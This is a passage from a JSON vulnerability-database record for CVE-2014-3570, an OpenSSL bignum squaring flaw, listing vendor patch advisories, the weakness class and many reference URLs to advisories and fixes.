"url": "http://support.apple.com/ja-jp/ht204659" }, { "title": "cisco-sa-20150310-ssl", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl" }, { "title": "Fix for CVE-2014-3570 (with minor bn_asm.c revamp).", "trust": 0.8, "url": "https://github.com/openssl/openssl/commit/a7a44ba55cb4f884c6bc9ceac90072dea38e66d0" }, { "title": "HS15-031", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs15-031/index.html" }, { "title": "HPSBUX03244 SSRT101885", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04556853" }, { "title": "HPSBGN03299", "trust": 0.8, "url": "http://marc.info/?l=bugtraq\u0026m=142720981827617\u0026w=2" }, { "title": "HPSBHF03289", "trust": 0.8, "url": "http://marc.info/?l=bugtraq\u0026m=142721102728110\u0026w=2" }, { "title": "NV15-017", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-017.html" }, { "title": "Bignum squaring may produce incorrect results (CVE-2014-3570)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv_20150108.txt" }, { "title": "Oracle Critical Patch Update Advisory - July 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015verbose-2367947.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Oracle Critical Patch Update Advisory - April 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html" }, { "title": "Text Form of Oracle Critical Patch Update - April 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015verbose-2365613.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015verbose-2367954.html" }, { "title": "Oracle Third Party Bulletin - January 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "title": "RHSA-2015:0066", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0066.html" }, { "title": "RHSA-2015:0849 ", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2015-0849.html" }, { "title": "July 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2015_critical_patch_update" }, { "title": "July 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update" }, { "title": "April 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/april_2015_critical_patch_update" }, { "title": "October 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2015_critical_patch_update" }, { "title": "cisco-sa-20150310-ssl", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1128/1128755_cisco-sa-20150310-ssl-j.html" }, { "title": "HS15-031", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs15-031/index.html" }, { "title": "\u682a\u5f0f\u4f1a\u793e\u30d0\u30c3\u30d5\u30a1\u30ed\u30fc \u306e\u544a\u77e5\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://buffalo.jp/support_s/s20150327b.html" }, { "title": "TLSA-2015-2", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2015/tlsa-2015-2j.html" }, { "title": "openssl-1.0.0p", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=53190" }, { "title": "openssl-0.9.8zd", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=53189" }, { "title": "openssl-1.0.1k.tar.gz", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=53191" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20150066 - security advisory" }, { "title": "Red Hat: CVE-2014-3570", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-3570" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2459-1" }, { "title": "Debian Security Advisories: DSA-3125-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=a3210fee56d96657bbff4ad44c3d0807" }, { "title": "Tenable Security Advisories: [R7] OpenSSL \u002720150108\u0027 Advisory Affects Tenable Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2015-03" }, { "title": "Amazon Linux AMI: ALAS-2015-469", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-469" }, { "title": "IBM: IBM Security Bulletin: Fabric OS firmware for Brocade 8Gb SAN Switch Module for BladeCenter is affected by vulnerabilities in OpenSSL and OpenSSH", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b7f5b1e7edcafce07f28205855d4db49" }, { "title": "Symantec Security Advisories: SA88 : OpenSSL Security Advisory 08-Jan-2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=9281dc3b1a760e1cf2711cdf82cf64d7" }, { "title": "Apple: OS X Yosemite v10.10.3 and Security Update 2015-004", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=aa5ab46566482c02434bb8cf65c9614e" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL (January 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150310-ssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4b527561ba1a5de7a529c8a93679f585" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eaf98750f1130c39e83765575c69e165" }, { "title": "Splunk Security Announcements: Splunk response to January 2015 OpenSSL vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=21b119528a2fb8c78850a17027b71424" }, { "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=459961024c4bdce7bb3a1a40a65a6f2e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3570" }, { "db": "JVNDB", "id": "JVNDB-2014-007551" }, { "db": "CNNVD", "id": "CNNVD-201501-160" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-310", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007551" }, { "db": "NVD", "id": "CVE-2014-3570" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2015-0849.html" }, { "trust": 1.4, "url": "https://www.openssl.org/news/secadv_20150108.txt" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.4, "url": "https://bto.bluecoat.com/security-advisory/sa88" }, { "trust": 1.4, "url": "https://support.citrix.com/article/ctx216642" }, { "trust": 1.1, "url": "https://github.com/openssl/openssl/commit/a7a44ba55cb4f884c6bc9ceac90072dea38e66d0" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-january/147938.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-january/148363.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/71939" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:019" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3125" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142496289803847\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00021.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0066.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142720981827617\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142721102728110\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/apr/msg00001.html" }, { "trust": 1.1, "url": "https://support.apple.com/ht204659" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00026.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050297101809\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050254401665\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143748090628601\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050155601375\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142895206924048\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050205101530\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142496179803395\u0026w=2" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2016-1650.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10679" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033378" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00037.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10108" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10102" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3570" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu91828320/index.html" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu98974537/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3570" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275" }, { "trust": 0.6, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.6, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887855" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2148/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.4252/" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765169" }, { "trust": 0.3, "url": "http://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2015-01-30.pdf" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://www.splunk.com/view/sp-caaanu5#affectedproductsandcomponents" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699883" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/160" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10679\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101010784" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04746490" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04602055" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765115" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774019" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774021" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698818" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883857" }, { "trust": 0.3, "url": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory12.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699271" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101008182" }, { "trust": 0.3, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.3, "url": "https://www.alienvault.com/forums/discussion/4475/security-advisory-alienvault-v4-15-1-addresses-twenty-20-vulnerabilities" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098593" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903299" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022575" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005159" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700275" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699938" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097733" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005170" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097503" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883287" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097811" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097504" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902694" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902277" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21697291" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699235" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903726" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097796" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21697162" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097823" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700411" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=swg21700028" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005150" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009328" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21695985" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022074" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701453" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959002" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21694849" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097360" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699052" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698506" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699810" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699069" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0207" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0285" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0208" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0118" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0226" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0231" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-3570" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8142" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0231" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9653" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9705" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0232" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9427" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9652" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/310.html" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=36959" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2459-1/" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-c54de3da8602433283d55e7369" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0291" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1787" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-676ddad17a06423589ee8889d0" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0290" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0292" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-72d53359c85340f899e81986a7" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0118" }, { "trust": 0.1, "url": "https://www.frida.re" }, { "trust": 0.1, "url": "https://support.apple.com/en-us/ht204658" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6438" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3487" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3597" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3670" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0238" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2497" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3587" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0237" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3669" }, { "trust": 0.1, "url": "https://support.apple.com/en-" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0098" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3538" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0117" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3480" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3668" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0207" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5704" }, { "trust": 0.1, "url": "http://dtorres.me)" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3479" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3478" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6712" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3572\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0205\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:01/openssl-9.3.patch" }, { "trust": 0.1, "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0206\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3571\u003e" }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv_20150108.txt\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8275\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:01/openssl-10.0.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:01/openssl-10.1.patch" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3569\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3570\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-15:01.openssl.asc\u003e" }, { "trust": 0.1, "url": "https://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:01/openssl-10.0.patch" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0204\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:01/openssl-9.3.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:01/openssl-10.1.patch.asc" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0204" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3586" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0277" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0277" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0226" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-8111" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8111" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3586" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=appplatform\u0026version=6.4" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0227" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0227" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0226" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5409" }, { "trust": 0.1, "url": "http://h20566.www2.hpe.com/hpsc/doc/public/display?calledby=search_result\u0026doc" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5412" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5413" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-20861d704bc04221a1518b7cb6" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5410" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5411" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": 